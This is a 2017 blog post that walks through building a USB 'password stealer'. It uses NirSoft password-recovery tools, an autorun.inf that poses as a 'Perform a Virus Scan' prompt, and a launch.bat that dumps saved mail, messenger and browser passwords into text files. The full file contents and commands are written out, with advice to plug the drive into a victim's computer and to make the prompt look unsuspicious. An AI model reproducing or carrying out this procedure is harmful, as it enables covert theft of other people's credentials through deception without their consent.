Thursday 3 August 2017

Use This Trick To Steal Passwords with Your Mobile Phone

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How To Steal Passwords with your mobile phone, you'll need these apps listed below;
  1. MessenPass 
  2. Mail PassView 
  3. IE Passview 
  4. Protected storage pass viewer(PSPV) 
  5. Password Fox 
You can find these and tons more at http://www.nirsoft.net/ )

Steps to steal passwords with your mobile phone

  1. First of all download all 5 tools in your memory card. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your memory card. Make sure you have all the installation files in your memory card [if any]) 
  2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan Save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your memory card. 
  3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.) start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt 
  4. Save the Notepad and rename it from New Text Document.txt to launch.bat 
  5. Copy the launch.bat file also to your USB drive. 
These were simple commands to start up our password “recovering” programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files. Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work. See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious. This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.
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